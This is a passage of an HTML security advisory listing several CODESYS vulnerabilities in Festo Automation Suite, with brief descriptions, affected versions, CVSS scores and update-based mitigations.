<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/12.html">CWE-12 ASP.NET Misconfiguration: Missing Custom Error Page</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-30791</a></h3>
<div class="csaf-accordion-content">
<p>In CmpBlkDrvTcp of CODESYS V3 in multiple versions an uncontrolled ressource consumption allows an unauthorized attacker to block new TCP connections. Existing connections are not affected.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-30791">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/400.html">CWE-400 Uncontrolled Resource Consumption</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-30792</a></h3>
<div class="csaf-accordion-content">
<p>In CmpChannelServer of CODESYS V3 in multiple versions an uncontrolled ressource consumption allows an unauthorized attacker to block new communication channel connections. Existing connections are not affected.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-30792">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/400.html">CWE-400 Uncontrolled Resource Consumption</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-31805</a></h3>
<div class="csaf-accordion-content">
<p>In the CODESYS Development System multiple components in multiple versions transmit the passwords for the communication between clients and servers unprotected.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-31805">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/523.html">CWE-523 Unprotected Transport of Credentials</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-31806</a></h3>
<div class="csaf-accordion-content">
<p>In CODESYS V2 PLCWinNT and Runtime Toolkit 32 in versions prior to V2.4.7.57 password protection is not enabled by default and there is no information or prompt to enable password protection at login in case no password is set at the controller.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-31806">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1188.html">CWE-1188 Initialization of a Resource with an Insecure Default</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-32136</a></h3>
<div class="csaf-accordion-content">
<p>In multiple CODESYS products, a low privileged remote attacker may craft a request that cause a read access to an uninitialized pointer, resulting in a denial-of-service. User interaction is not required.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-32136">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/82.html">CWE-82 Improper Neutralization of Script in Attributes of IMG Tags in a Web Page</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-32137</a></h3>
<div class="csaf-accordion-content">
<p>In multiple CODESYS products, a low privileged remote attacker may craft a request, which may cause a heap-based buffer overflow, resulting in a denial-of-service condition or memory overwrite. User interaction is not required.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-32137">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/122.html">CWE-122 Heap-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-32138</a></h3>
<div class="csaf-accordion-content">
<p>In multiple CODESYS products, a remote attacker may craft a request which may cause an unexpected sign extension, resulting in a denial-of-service condition or memory overwrite.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-32138">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/194.html">CWE-194 Unexpected Sign Extension</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-32139</a></h3>
<div class="csaf-accordion-content">
<p>In multiple CODESYS products, a low privileged remote attacker may craft a request, which cause an out-of-bounds read, resulting in a denial-of-service condition. User Interaction is not required.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-32139">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
